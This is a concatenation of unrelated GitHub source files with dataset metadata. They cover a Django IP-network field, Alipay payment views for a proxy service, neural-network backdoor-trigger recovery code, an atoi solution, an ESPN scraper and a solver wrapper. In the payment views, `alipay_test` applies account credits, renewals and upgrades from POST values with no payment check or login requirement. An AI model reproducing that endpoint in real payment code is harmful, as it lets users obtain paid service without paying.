        super().__init__(verbose_name, name, *args, **kwargs)

    def check(self, **kwargs):
        """Run standard field checks plus the blank/null consistency check."""
        errors = super().check(**kwargs)
        errors.extend(self._check_blank_and_null_values(**kwargs))
        return errors

    def _check_blank_and_null_values(self, **kwargs):
        # blank=True with null=False would store blank values as NULL,
        # which the column then forbids.
        if not getattr(self, 'null', False) and getattr(self, 'blank', False):
            return [
                checks.Error(
                    'GenericIPNetworkField cannot have blank=True if null=False, '
                    'as blank values are stored as nulls.',
                    obj=self,
                    id='fields.E150',
                )
            ]
        return []

    def deconstruct(self):
        """Omit kwargs that match the defaults so migrations stay minimal."""
        name, path, args, kwargs = super().deconstruct()
        if self.protocol != "both":
            kwargs['protocol'] = self.protocol
        if kwargs.get("max_length") == 43:
            del kwargs['max_length']
        return name, path, args, kwargs

    def get_internal_type(self):
        return "GenericIPNetworkField"

    def to_python(self, value):
        """Normalize *value* to a string, canonicalizing IPv6 CIDR input.

        BUG FIX: removed a leftover `import ipdb; ipdb.set_trace()`
        debugging breakpoint that froze every call.
        """
        if value is None:
            return None
        if not isinstance(value, str):
            value = str(value)
        value = value.strip()
        if ':' in value:
            # BUG FIX: the original called the undefined
            # clean_ipv6_network with a non-existent self.unpack_ipv4
            # attribute; use the imported clean_ipv6_cidr helper, matching
            # get_prep_value below.
            return clean_ipv6_cidr(value)
        return value

    def get_db_prep_value(self, value, connection, prepared=False):
        if not prepared:
            value = self.get_prep_value(value)
        return connection.ops.adapt_ipaddressfield_value(value)

    def get_prep_value(self, value):
        """Best-effort IPv6 canonicalization before hitting the database."""
        value = super().get_prep_value(value)
        if value is None:
            return None
        if value and ':' in value:
            try:
                return clean_ipv6_cidr(value)
            except exceptions.ValidationError:
                # Fall through and store the raw string; the validators
                # have already flagged truly invalid input.
                pass
        return str(value)

    def formfield(self, **kwargs):
        """Use the matching form field, passing the protocol through."""
        defaults = {
            'protocol': self.protocol,
            'form_class': forms.GenericIPNetworkField,
        }
        defaults.update(kwargs)
        return super().formfield(**defaults)
|
MilkBotttle/BFP
|
fields/cidr.py
|
cidr.py
|
py
| 2,978 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31228319050
|
#coding=utf-8
from thuproxy.alipay_api import *
from thuproxy.proxy_account_views import *
import datetime
import uuid
import urllib.request
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response, RequestContext
# Discount ratio applied to the displayed price.
RATE = 0.6
# Entry point that chooses the order page per payment type.
@login_required(login_url="/login/")
def alipay_apply(request, pay_type):
    """Show the appropriate order-creation page for *pay_type*.

    pay_type -- 'first' | 'upgrade' | 'downgrade' | 'continue'
    Redirects to /homepage with a session "error" marker when the flow is
    not applicable (unpaid order pending, already at top/bottom tier,
    expired account, ...).
    """
    is_user_login = request.user.is_authenticated()
    user = request.user
    proxy_account = ProxyAccount.objects.get(user=request.user)
    # Refuse to start a new order while an unpaid ('U') one exists.
    pay_list = Pay.objects.filter(user_id=user.id, status='U')
    if len(pay_list) != 0:
        request.session["error"] = "need_repay"
        return HttpResponseRedirect('/homepage')
    # Dispatch on the payment type.
    if pay_type == 'first':
        # First payment only for accounts that never had one.
        if proxy_account.expired_date is not None:
            request.session["error"] = "first_pay"
            return HttpResponseRedirect('/homepage')
        return render_to_response('alipay_create_order_first.html', locals(), context_instance=RequestContext(request))
    elif pay_type == 'upgrade':
        # Already at the top tier (50): nothing to upgrade to.
        if proxy_account.type == 50:
            request.session["error"] = "upgrade"
            return HttpResponseRedirect('/homepage')
        if datetime.datetime.now().date() < proxy_account.expired_date:
            remain_time = proxy_account.expired_date - datetime.datetime.now().date()
            proxy_account.remain_time = int(remain_time.days)
        elif datetime.datetime.now().date() >= proxy_account.expired_date:
            # Expired accounts cannot upgrade.
            request.session["error"] = "date"
            return HttpResponseRedirect('/homepage')
        return render_to_response('alipay_create_order_upgrade.html', locals(),
                                  context_instance=RequestContext(request))
    elif pay_type == 'downgrade':
        # Already at the bottom tier (1): nothing to downgrade to.
        if proxy_account.type == 1:
            request.session["error"] = "downgrade"
            return HttpResponseRedirect('/homepage')
        remain_time = proxy_account.expired_date - datetime.datetime.now().date()
        proxy_account.remain_time = int(remain_time.days)
        return render_to_response('alipay_create_order_downgrade.html', locals(),
                                  context_instance=RequestContext(request))
    elif pay_type == 'continue':
        return render_to_response('alipay_create_order_continue.html', locals(),
                                  context_instance=RequestContext(request))
    else:
        return HttpResponse('充值请求错误')
# Create a new payment order.
@login_required(login_url="/login/")
def alipay_create_orders(request):
    """Create a Pay record from POST data and render the Alipay order page.

    POST: money (display price), pay_type (1=first, 2=renew, 3=upgrade),
    and month — or day when upgrading, since an upgrade records the
    account's remaining days rather than a number of paid months.
    """
    is_user_login = request.user.is_authenticated()
    user = request.user
    proxy_account = ProxyAccount.objects.get(user=request.user)
    m = request.POST['money']
    # Charge the discounted price, rounded to cents.
    money = float(m) * RATE
    money = round(money, 2)
    pay_type = int(request.POST['pay_type'])
    today = timezone.now()
    try:
        # Upgrades store the remaining days instead of months to pay.
        if pay_type == 3:
            day = request.POST['day']
            pay = Pay(out_trade_no=uuid.uuid1().hex, user=user, total_fee=money, type=int(pay_type),
                      month=int(day), status='U', create_date=today)
        else:
            month = request.POST['month']
            pay = Pay(out_trade_no=uuid.uuid1().hex, user=user, total_fee=money, type=int(pay_type),
                      month=int(month), status='U', create_date=today)
        pay.save()
        params = {'out_trade_no': pay.out_trade_no, 'subject': u'清云加速',
                  'body': u'流量购买费用', 'total_fee': str(money)}
        total_fee = pay.total_fee
        alipay = Alipay(notifyurl="http://scholar.thucloud.com/alipay/callback",
                        returnurl="http://scholar.thucloud.com/alipay/success",
                        showurl="http://scholar.thucloud.com/alipay/success")
        params.update(alipay.conf)
        sign = alipay.buildSign(params)
        return render_to_response('alipay_show_order.html', locals())
    except Exception as e:
        print(e)
        return HttpResponse('生成订单错误')
# Re-render the payment page for an existing unpaid order.
@login_required(login_url="/login/")
def alipay_repay_orders(request, pay_no):
    """Rebuild the Alipay order page for the existing order *pay_no*."""
    is_user_login = request.user.is_authenticated()
    user = request.user
    proxy_account = ProxyAccount.objects.get(user=request.user)
    try:
        pay_list = Pay.objects.filter(out_trade_no=pay_no)
        # Exactly one matching order is required.
        if len(pay_list) != 1:
            request.session["error"] = "repay"
            return HttpResponseRedirect('/homepage')
        else:
            pay = pay_list[0]
            params = {'out_trade_no': pay.out_trade_no, 'subject': u'清云加速',
                      'body': u'流量购买费用', 'total_fee': str(pay.total_fee)}
            total_fee = pay.total_fee
            alipay = Alipay(notifyurl="http://scholar.thucloud.com/alipay/callback",
                            returnurl="http://scholar.thucloud.com/alipay/success",
                            showurl="http://scholar.thucloud.com/alipay/success")
            params.update(alipay.conf)
            sign = alipay.buildSign(params)
            money = pay.total_fee
            return render_to_response('alipay_show_order.html', locals())
    except Exception as e:
        print(e)
        return HttpResponse('显示订单错误')
@csrf_exempt
def alipay_callback(request):
    """Asynchronous Alipay notify endpoint.

    Verifies the callback signature and trade status, double-checks the
    notify_id with Alipay's verify URL, then applies the paid order to
    the user's proxy account (first payment / renewal / upgrade).
    Responds "success" so Alipay stops retrying, or "fail"/an error
    string otherwise.
    """
    try:
        print(datetime.datetime.now())
        print("call back start")
        params = request.POST.dict()
        if not isinstance(params, dict):
            print('error params not dict')
        alipay = Alipay()
        # Validate the callback signature against our own computation.
        sign = None
        if 'sign' in params:
            sign = params['sign']
        loc_sign = alipay.buildSign(params)
        if sign is None or loc_sign != sign:
            return HttpResponse("fail")
        print("sign is ok")
        # Only finished/successful trades may be processed, to avoid
        # crediting the same trade twice.
        if params['trade_status'] != 'TRADE_FINISHED' and params['trade_status'] != 'TRADE_SUCCESS':
            print('trade status error')
            return HttpResponse("fail")
        else:
            print("trade status ok")
            print("url: ")
            # BUG FIX: the query string had been corrupted to "¬ify_id"
            # (an "&not..." HTML-entity mangling of "&notify_id").
            url = verifyURL['https'] + "&partner=%s&notify_id=%s" % (alipay.conf['partner'], params['notify_id'])
            print(url)
            response = urllib.request.urlopen(url)
            html = response.read()
            print("aliypay.com return: %s" % html)
            # Alipay confirms the notification is genuine.
            if html == b'true':
                print('result is true')
                try:
                    out_trade_no = params['out_trade_no']
                    print('out trade no ', out_trade_no)
                    trade_no = params['trade_no']
                    print('trade no ', trade_no)
                    total_fee = params['total_fee']
                    pay = Pay.objects.get(out_trade_no=out_trade_no)
                    # todo: handle other error status
                    if pay is None:
                        return HttpResponse("无此订单,请重新下单")
                    if pay.status == 'S':
                        return HttpResponse("已经成功支付了")
                    print('user', pay.user)
                    proxy_account = ProxyAccount.objects.get(user=pay.user)
                    print('proxy_account', proxy_account)
                    print('pay total fee', pay.total_fee)
                    month = pay.month
                    pay_type = pay.type
                    # Undo the discount to recover the nominal price.
                    real_fee = float(total_fee) / RATE
                    print('month', month)
                    print('pay type', pay_type)
                    print('real fee', real_fee)
                    # pay_type 1: first payment — derive the tier from
                    # price-per-month and initialize the account.
                    if pay_type == 1:
                        account_type = int(real_fee)/int(month)
                        print("accounttype", account_type)
                        if account_type not in {1, 5, 10, 20, 50}:
                            return HttpResponse("accout_type_error")
                        else:
                            print("success:", account_type, " month", month)
                            proxy_account.type = account_type
                            today = datetime.datetime.now()
                            if proxy_account.expired_date is not None:
                                return HttpResponse("not init")
                            else:
                                print("init date")
                                expired_date = today + datetime.timedelta(30*int(month))
                                if proxy_account.paydate is None:
                                    create_pac(proxy_account)
                                    print("create_pac done")
                                    open_listen_port(proxy_account.port, proxy_account.type)
                                    print("open_listen_port done")
                                    proxy_account.paydate = today
                                    proxy_account.expired_date = expired_date
                    elif pay_type == 2:  # renewal
                        account_type = int(real_fee)/int(month)
                        print("accounttype", account_type)
                        if account_type != proxy_account.type or proxy_account.expired_date is None:
                            return HttpResponse("accout_type_error")
                        else:
                            print("success:", account_type, " month", month)
                            today = datetime.date.today()
                            print("add month")
                            if proxy_account.expired_date < today:  # account already expired
                                expired_date = today + datetime.timedelta(30*int(month))
                                reopen_port(proxy_account.port)
                            else:
                                expired_date = proxy_account.expired_date + datetime.timedelta(30*int(month))
                            proxy_account.expired_date = expired_date
                    elif pay_type == 3:  # upgrade
                        today = datetime.date.today()
                        if proxy_account.expired_date < today:  # account already expired
                            return HttpResponse("fail")
                        # month holds the remaining days here; convert the
                        # fee into a tier increment (+0.1 rounds off float
                        # noise before truncation).
                        upgrade_delta = (real_fee/month)*30
                        upgrade_delta = int(upgrade_delta+0.1)
                        print(upgrade_delta)
                        proxy_account.type += upgrade_delta
                        if proxy_account.type not in {1, 5, 10, 20, 50}:
                            return HttpResponse("accout_type_error")
                        if ACCOUNT_TRAFFIC_LIMIT[int(proxy_account.type)] > proxy_account.traffic:
                            reopen_port(proxy_account.port)
                        # Adjust bandwidth and traffic quota.
                        upgrade_port(proxy_account.port, proxy_account.type)
                    else:
                        # Unknown pay type: mark the order failed.
                        pay.status = 'F'
                        pay.save()
                        return HttpResponse("fail")
                    print("sava pay")
                    pay.status = 'S'
                    pay.trade_no = trade_no
                    pay.total_fee = real_fee
                    pay.save()
                    print("sava proxy_account")
                    proxy_account.save()
                    return HttpResponse("success")
                except Exception as e:
                    print(e)
                    return HttpResponse("fail")
    except Exception as e:
        # BUG FIX: the original returned before printing, leaving the
        # print(e) unreachable; log the error first.
        print(e)
        return HttpResponse("fail")
@login_required(login_url="/login/")
def alipay_success(request):
    """Render the payment-success page for the logged-in user's proxy account."""
    # Passed to the template via locals() along with proxy_account.
    is_user_login = request.user.is_authenticated()
    proxy_account = ProxyAccount.objects.get(user=request.user)
    return render_to_response('alipay_success.html', locals(), context_instance=RequestContext(request))
@login_required(login_url="/login/")
def alipay_cancel(request, pay_no):
    """Mark the payment with out_trade_no == pay_no as cancelled ('C').

    If the order number does not resolve to exactly one Pay record, an
    error flag is stored in the session instead.  Either way the user is
    redirected to the home page.
    """
    print(pay_no)
    matches = Pay.objects.filter(out_trade_no=pay_no)
    if len(matches) != 1:
        # Unknown or ambiguous order number: flag and bail out.
        request.session["error"] = "cancel"
        return HttpResponseRedirect('/homepage')
    cancelled = matches[0]
    cancelled.status = 'C'
    cancelled.save()
    return HttpResponseRedirect('/homepage')
def alipay_test(request):
    """Test endpoint mirroring the real payment callback: applies a payment
    (1 = first activation, 2 = renewal, 3 = upgrade) to the user's proxy
    account and redirects to the home page on success.
    """
    pay_type = int(request.POST['pay_type'])
    month = int(request.POST['month'])
    total_fee = float(request.POST['money'])
    total_fee *= RATE
    proxy_account = ProxyAccount.objects.get(user=request.user)
    # real_fee undoes the RATE multiplication above, recovering the posted amount.
    real_fee = float(total_fee/RATE)
    print('realfee', real_fee)
    if pay_type == 1:
        # First activation: monthly fee determines the account tier.
        # NOTE(review): under Python 3 this division yields a float; the set
        # membership still matches because e.g. 5.0 == 5 — confirm intended.
        account_type = int(real_fee)/int(month)
        print("accounttype", account_type)
        if account_type not in {1, 5, 10, 20, 50}:
            return HttpResponse("accout_type_error")
        else:
            print("success:", account_type, " month", month)
            proxy_account.type = account_type
            today = datetime.datetime.now()
            if proxy_account.expired_date is not None:
                # Account already initialised: activation is a one-time operation.
                print("add month")
                return HttpResponse("not init")
            else:
                print("init month")
                # 30 days per purchased month.
                expired_date = today + datetime.timedelta(30*int(month))
                if proxy_account.paydate is None:
                    # Very first payment: provision PAC file and open the port.
                    print("init paydate")
                    create_pac(proxy_account)
                    print("create_pac done")
                    open_listen_port(proxy_account.port, proxy_account.type)
                    print("open_listen_port done")
                    proxy_account.paydate = today
                proxy_account.expired_date = expired_date
    elif pay_type == 2:
        # Renewal: fee/month must match the existing tier.
        account_type = int(real_fee)/int(month)
        print("accounttype", account_type)
        if account_type != proxy_account.type or proxy_account.expired_date is None:
            return HttpResponse("accout_type_error")
        else:
            print("success:", account_type, " month", month)
            today = datetime.date.today()
            print("add month")
            if proxy_account.expired_date < today:
                # Already expired: restart the window from today.
                expired_date = today + datetime.timedelta(30*int(month))
            else:
                # Still active: extend from the current expiry date.
                expired_date = proxy_account.expired_date + datetime.timedelta(30*int(month))
            proxy_account.expired_date = expired_date
    elif pay_type == 3:
        # Upgrade: fee prorated to a 30-day delta added onto the tier.
        upgrade_delta = (real_fee/month)*30
        # +0.1 guards against float truncation (e.g. 4.999... -> 5).
        upgrade_delta = int(upgrade_delta+0.1)
        print(upgrade_delta)
        proxy_account.type += upgrade_delta
        if proxy_account.type not in {1, 5, 10, 20, 50}:
            return HttpResponse("accout_type_error")
        reopen_port(proxy_account.port)
    else:
        return HttpResponse("fail")
    print("sava proxy_account")
    proxy_account.save()
    return HttpResponseRedirect('/homepage')
|
flyz1360/scholarcloud
|
thuproxy/pay_views.py
|
pay_views.py
|
py
| 14,990 |
python
|
en
|
code
| 1 |
github-code
|
6
|
74550779386
|
import torch
from torch import Tensor, nn
import torchvision
import os
import numpy as np
class Normalize:
    """Per-channel standardization: out[:, c] = (x[:, c] - mean[c]) / std[c].

    Operates on batched tensors whose second dimension indexes channels;
    the input tensor is left untouched (a clone is returned).
    """

    def __init__(self, n_channels, expected_values, variance):
        self.n_channels = n_channels
        self.expected_values = expected_values
        self.variance = variance
        assert self.n_channels == len(self.expected_values)

    def __call__(self, x):
        out = x.clone()
        for c in range(self.n_channels):
            mean = self.expected_values[c]
            std = self.variance[c]
            out[:, c] = (x[:, c] - mean) / std
        return out
class Denormalize:
    """Inverse of Normalize: out[:, c] = x[:, c] * std[c] + mean[c].

    The input tensor is left untouched (a clone is returned).
    """

    def __init__(self, n_channels, expected_values, variance):
        self.n_channels = n_channels
        self.expected_values = expected_values
        self.variance = variance
        assert self.n_channels == len(self.expected_values)

    def __call__(self, x):
        out = x.clone()
        for c in range(self.n_channels):
            mean = self.expected_values[c]
            std = self.variance[c]
            out[:, c] = x[:, c] * std + mean
        return out
class RegressionModel(nn.Module):
    """Frozen classifier plus a learnable trigger (mask + pattern).

    The forward pass blends the trigger into the input,
    (1 - mask) * x + mask * pattern, and classifies the result; only the
    mask/pattern parameters receive gradients.
    """
    def __init__(self, task, model, init_mask, init_pattern):
        self._EPSILON = 1e-7
        super(RegressionModel, self).__init__()
        # Unconstrained parameters; squashed into (0, 1) by get_raw_*.
        self.mask_tanh = nn.Parameter(torch.tensor(init_mask))
        self.pattern_tanh = nn.Parameter(torch.tensor(init_pattern))
        self.classifier = self._get_classifier(model)
        self.normalizer = self._get_normalize(task)
        self.denormalizer = self._get_denormalize(task)

    def forward(self, x):
        mask = self.get_raw_mask()
        pattern = self.get_raw_pattern()
        if self.normalizer:
            # The pattern lives in [0, 1] image space; normalize it to the
            # classifier's expected input statistics before blending.
            pattern = self.normalizer(self.get_raw_pattern())
        x = (1 - mask) * x + mask * pattern
        return self.classifier(x)

    def get_raw_mask(self):
        # tanh in (-1, 1) -> value in (0, 1); epsilon keeps it strictly inside.
        mask = nn.Tanh()(self.mask_tanh)
        return mask / (2 + self._EPSILON) + 0.5

    def get_raw_pattern(self):
        pattern = nn.Tanh()(self.pattern_tanh)
        return pattern / (2 + self._EPSILON) + 0.5

    def _get_classifier(self, model):
        # Freeze the classifier so the optimizer only updates mask/pattern.
        classifier = model
        for param in classifier.parameters():
            param.requires_grad = False
        classifier.eval()
        return classifier.to('cuda')

    def _get_denormalize(self, task):
        """Return the per-task inverse normalization, or None for gtsrb."""
        if task == 'cifar10':
            denormalizer = Denormalize(3, [0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261])
        elif task == 'mnist':
            denormalizer = Denormalize(1, [0.5], [0.5])
        elif task == 'imageNet':
            denormalizer = Denormalize(3, [0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
        elif task == 'gtsrb':
            denormalizer = None
        else:
            raise Exception("Invalid dataset")
        return denormalizer

    def _get_normalize(self, task):
        """Return the per-task normalization, or None for gtsrb."""
        if task == 'cifar10':
            normalizer = Normalize(3, [0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261])
        elif task == 'mnist':
            normalizer = Normalize(1, [0.5], [0.5])
        elif task == 'imageNet':
            # BUG FIX: this branch previously constructed Denormalize, which
            # would have *denormalized* the pattern in forward() for imageNet.
            normalizer = Normalize(3, [0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
        elif task == 'gtsrb':
            normalizer = None
        else:
            raise Exception("Invalid dataset")
        return normalizer
class Recorder:
    """Tracks the best trigger (mask/pattern) found so far, plus the state
    used to adapt the regularization cost and to decide early stopping."""

    def __init__(self, target_label, task):
        super().__init__()
        self.task = task
        self.target_label = target_label
        # Best optimization result so far.
        self.mask_best = None
        self.pattern_best = None
        self.reg_best = float('inf')
        # Bookkeeping for the adaptive balance cost.
        self.logs = []
        self.cost = 1e-3
        self.cost_multiplier_up = 2
        self.cost_multiplier_down = 2 ** 1.5
        self.cost_set_counter = 0
        self.cost_up_counter = 0
        self.cost_down_counter = 0
        self.cost_up_flag = False
        self.cost_down_flag = False
        # Early-stop bookkeeping.
        self.early_stop_counter = 0
        self.early_stop_reg_best = self.reg_best

    def reset_state(self):
        """Reset the cost and its adjustment counters/flags to their defaults."""
        self.cost = 1e-3
        self.cost_up_counter = 0
        self.cost_down_counter = 0
        self.cost_up_flag = False
        self.cost_down_flag = False
        print("Initialize cost to {:f}".format(self.cost))

    def save_result_to_dir(self):
        """Write mask.png, pattern.png and trigger.png for the current best
        result under <task>/u_t_<task>/<target_label>/."""
        out_dir = '%s/u_t_%s' % (self.task, self.task)
        if not os.path.exists(out_dir):
            os.makedirs(out_dir)
        out_dir = os.path.join(out_dir, str(self.target_label))
        if not os.path.exists(out_dir):
            os.makedirs(out_dir)
        trigger = self.pattern_best * self.mask_best
        torchvision.utils.save_image(self.mask_best, os.path.join(out_dir, 'mask.png'), normalize=True)
        torchvision.utils.save_image(self.pattern_best, os.path.join(out_dir, 'pattern.png'), normalize=True)
        torchvision.utils.save_image(trigger, os.path.join(out_dir, 'trigger.png'), normalize=True)
class UniversalTrigger:
    """Container mapping target labels to their recovered universal triggers."""

    def __init__(self):
        self.universal_trigger_dict = {}
def train(task, model, target_label, init_mask, init_pattern, test_loader):
    """Optimize a universal trigger (mask + pattern) that steers *model*
    toward *target_label*, and return the Recorder holding the best result.

    Runs up to 50 epochs of train_step; stops early when train_step reports
    convergence.  The best result is also written to disk.
    """
    trigger_model = RegressionModel(task, model, init_mask, init_pattern).to('cuda')
    optimizer = torch.optim.Adam(trigger_model.parameters(), lr=1e-1, betas=(0.5, 0.9))
    recorder = Recorder(target_label, task)
    for epoch in range(50):
        if train_step(trigger_model, optimizer, test_loader, recorder, epoch, target_label):
            break
    # Persist whatever best result was recorded.
    recorder.save_result_to_dir()
    return recorder
def train_step(regression_model, optimizerR, dataloader, recorder, epoch, target_label,early_stop=True):
    """Run one optimization epoch over *dataloader*.

    Minimizes cross-entropy toward *target_label* plus a cost-weighted L2
    penalty on the mask, records the best (smallest) mask found at >=99%
    attack accuracy, and adapts recorder.cost up/down based on recent
    accuracy.  Returns True when early stopping triggered.
    """
    print("Epoch {} - Label: {}".format(epoch, target_label))
    # Set losses
    cross_entropy = nn.CrossEntropyLoss()
    total_pred = 0
    true_pred = 0
    # Record loss for all mini-batches
    loss_ce_list = []
    loss_reg_list = []
    loss_list = []
    loss_acc_list = []
    # Set inner early stop flag
    inner_early_stop_flag = False
    for batch_idx, (inputs, labels) in enumerate(dataloader):
        # Forwarding and update model; every sample is pushed toward target_label.
        optimizerR.zero_grad()
        inputs = inputs.to('cuda')
        sample_num = inputs.shape[0]
        total_pred += sample_num
        target_labels = torch.ones((sample_num), dtype=torch.int64).to('cuda') * target_label
        predictions = regression_model(inputs)
        loss_ce = cross_entropy(predictions, target_labels)
        # L2 norm of the mask: the regularizer that keeps the trigger small.
        loss_reg = torch.norm(regression_model.get_raw_mask(), 2)
        total_loss = loss_ce + recorder.cost * loss_reg
        total_loss.backward()
        optimizerR.step()
        # Record minibatch information to list
        minibatch_accuracy = torch.sum(torch.argmax(predictions, dim=1) == target_labels).detach() * 100. / sample_num
        loss_ce_list.append(loss_ce.detach())
        loss_reg_list.append(loss_reg.detach())
        loss_list.append(total_loss.detach())
        loss_acc_list.append(minibatch_accuracy)
        true_pred += torch.sum(torch.argmax(predictions, dim=1) == target_labels).detach()
    loss_ce_list = torch.stack(loss_ce_list)
    loss_reg_list = torch.stack(loss_reg_list)
    loss_list = torch.stack(loss_list)
    loss_acc_list = torch.stack(loss_acc_list)
    avg_loss_ce = torch.mean(loss_ce_list)
    avg_loss_reg = torch.mean(loss_reg_list)
    avg_loss = torch.mean(loss_list)
    avg_loss_acc = torch.mean(loss_acc_list)
    # Check to save best mask or not: only accept a smaller mask when the
    # attack accuracy for this epoch is at least 99%.
    if avg_loss_acc >= 99. and avg_loss_reg < recorder.reg_best:
        recorder.mask_best = regression_model.get_raw_mask().detach()
        recorder.pattern_best = regression_model.get_raw_pattern().detach()
        recorder.reg_best = avg_loss_reg
        recorder.save_result_to_dir()
        print(" Updated !!!")
    # Show information
    print(' Result: Accuracy: {:.3f} | Cross Entropy Loss: {:.6f} | Reg Loss: {:.6f} | Reg best: {:.6f}'.format(
        true_pred * 100. / total_pred,
        avg_loss_ce,
        avg_loss_reg,
        recorder.reg_best))
    # Check early stop
    if early_stop:
        if recorder.reg_best < float('inf'):
            # NOTE(review): `99. * recorder.early_stop_reg_best` looks
            # suspicious — Neural-Cleanse-style implementations use a
            # threshold just below 1 (e.g. 0.99) here; confirm intended.
            if recorder.reg_best >= 99. * recorder.early_stop_reg_best:
                recorder.early_stop_counter += 1
            else:
                recorder.early_stop_counter = 0
        recorder.early_stop_reg_best = min(recorder.early_stop_reg_best, recorder.reg_best)
        if (
                recorder.cost_down_flag and recorder.cost_up_flag and recorder.early_stop_counter >= 25):
            print('Early_stop !!!')
            inner_early_stop_flag = True
    if not inner_early_stop_flag:
        # Check cost modification: bootstrap the cost once accuracy holds
        # at >=99% for 5 consecutive epochs while the cost is zero.
        if recorder.cost == 0 and avg_loss_acc >= 99.:
            recorder.cost_set_counter += 1
            if recorder.cost_set_counter >= 5:
                recorder.reset_state()
        else:
            recorder.cost_set_counter = 0
        # Accuracy high -> push the cost up (shrink mask harder);
        # accuracy low -> back the cost off.
        if avg_loss_acc >= 99.:
            recorder.cost_up_counter += 1
            recorder.cost_down_counter = 0
        else:
            recorder.cost_up_counter = 0
            recorder.cost_down_counter += 1
        if recorder.cost_up_counter >= 5:
            recorder.cost_up_counter = 0
            print("Up cost from {} to {}".format(recorder.cost, recorder.cost * recorder.cost_multiplier_up))
            recorder.cost *= recorder.cost_multiplier_up
            recorder.cost_up_flag = True
        elif recorder.cost_down_counter >= 5:
            recorder.cost_down_counter = 0
            print("Down cost from {} to {}".format(recorder.cost, recorder.cost / recorder.cost_multiplier_down))
            recorder.cost /= recorder.cost_multiplier_down
            recorder.cost_down_flag = True
    # Save the final version (fallback when no >=99%-accuracy epoch occurred).
    if recorder.mask_best is None:
        recorder.mask_best = regression_model.get_raw_mask().detach()
        recorder.pattern_best = regression_model.get_raw_pattern().detach()
    return inner_early_stop_flag
|
Mr-Ace-1997/SGBA-A-Stealthy-Scapegoat-Backdoor-Attack-against-Deep-Neural-Networks
|
utils_universal_trigger.py
|
utils_universal_trigger.py
|
py
| 10,352 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10502382952
|
class Solution:
    # @param A : string
    # @return an integer
    def atoi(self, s):
        """Parse a leading integer from *s* and clamp it to signed 32 bits.

        Surrounding whitespace is stripped, an optional single '+'/'-' sign
        is honoured, digit accumulation stops at the first non-digit, and
        the result is clamped to [-2**31, 2**31 - 1].  Empty/blank input
        yields 0.
        """
        s = s.strip()  # strips all spaces on left and right
        if not s:
            return 0
        sign = -1 if s[0] == '-' else 1
        val, index = 0, 0
        if s[0] in ['+', '-']:
            index = 1
        # Accumulate consecutive digits; non-digits terminate parsing.
        while index < len(s) and s[index].isdigit():
            val = val * 10 + ord(s[index]) - ord('0')
            index += 1
        # Clamp to the 32-bit signed integer range.
        return max(-2**31, min(sign * val, 2**31 - 1))
|
anojkr/help
|
interview_bit/string/atoi.py
|
atoi.py
|
py
| 542 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26191759535
|
import requests
import json
import re
import time
import csv
import MySQLdb as mdb
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
from helpers import *
"""
This script scrapes and stores the fantasy points achieved by each player for the 2013 season.
The data is stored in a .csv file.
"""
def main():
    """Scrape weekly 2013 fantasy points from ESPN and write them to
    espn-actual2.csv as (game_id, plyr_id, tot_pts, week) rows."""
    out = open("espn-actual2.csv", "wb")
    writer = csv.writer(out)
    writer.writerow(['game_id', 'plyr_id', 'tot_pts', 'week'])
    # Weeks 1-2, paginated 50 players at a time up to index 300.
    for week in range(1, 3):
        for start in range(0, 300, 50):
            url = "http://games.espn.go.com/ffl/leaders?&scoringPeriodId=%s&seasonId=2013&startIndex=%s" % (week, start)
            response = requests.get(url)
            soup = BeautifulSoup(response.content)
            for row in soup.find_all('tr', class_="pncPlayerRow"):
                # Player id is embedded in the row's DOM id (plyrNNNN).
                player_id = int(re.search(r'plyr(\d+)', row['id']).group(1))
                pts_cell = row.find('td', class_="playertableStat appliedPoints appliedPointsProGameFinal")
                points = pts_cell.contents[0].encode('ascii', 'ignore')
                # Game id comes from the gameId query parameter of the link
                # inside the game-status cell.
                game_cell = row.find('td', class_="gameStatusDiv")
                game_id = re.search(r'gameId=(\d+)', str(game_cell.find('a'))).group(1)
                if points == '--':
                    points = 0
                writer.writerow([game_id, player_id, points, week])
    out.close()
# Run the scraper only when executed as a script (not on import).
if __name__ == '__main__':
    main()
|
kwheeler27/insight_datasci
|
data/actual_fantasy_pts.py
|
actual_fantasy_pts.py
|
py
| 1,604 |
python
|
en
|
code
| 1 |
github-code
|
6
|
26829757478
|
#!/usr/bin/python
import json
import utils
import logging
import os
import subprocess
import smt_encoding
import pysmt.shortcuts
import re
import requests
import core_data
import hyportage_pattern
import hyportage_db
from pysmt.smtlib.parser import SmtLib20Parser
import cStringIO
"""
This file contains all the functions related to solving the constraints generated from a set of spls,
in order to compute a new configuration of the system
"""
__author__ = "Michael Lienhardt and Jacopo Mauro"
__copyright__ = "Copyright 2017, Michael Lienhardt and Jacopo Mauro"
__license__ = "GPL3"
__version__ = "0.5"
__maintainer__ = "Michael Lienhardt and Jacopo Mauro"
__email__ = "michael [email protected] & [email protected]"
__status__ = "Prototype"
##########################################################################
# UTILITIES TO CALL THE HYVAR-REC SOLVER
##########################################################################
def run_local_hyvar(json_data, explain_modality, cmd, par_cores):
    """
    Run hyvar locally assuming that there is a command hyvar-rec.
    Writes the problem to a temp JSON file, extends *cmd* with the solver
    options, and returns the parsed JSON answer (None on a non-zero exit).
    """
    input_file = utils.get_new_temp_file(".json")
    with open(input_file, "w") as stream:
        json.dump(json_data, stream)
    cmd.extend(["--constraints-minimization", "--features-as-boolean", "--no-default-preferences"])
    if explain_modality:
        cmd.append("--explain")
    if par_cores > 1:
        cmd.extend(["-p", unicode(par_cores)])
    cmd.append(input_file)
    # Run the solver as a subprocess, capturing both output streams.
    utils.phase_start("Running: " + unicode(cmd))
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = process.communicate()
    if process.returncode != 0:
        logging.error("command ended with an error code: " + str(process.returncode))
        return None
    logging.debug("Stderr of the command")
    logging.debug(err)
    utils.phase_end("Execution ended")
    return json.loads(out)
def run_remote_hyvar(json_data, explain_modality, url):
    """
    Run hyvar remotely by POSTing the problem to the service at *url*.
    Returns the parsed JSON answer, or None on HTTP error / error payload.
    """
    endpoint = url + ("/explain" if explain_modality else "/process")
    utils.phase_start("Invoking url: " + endpoint)
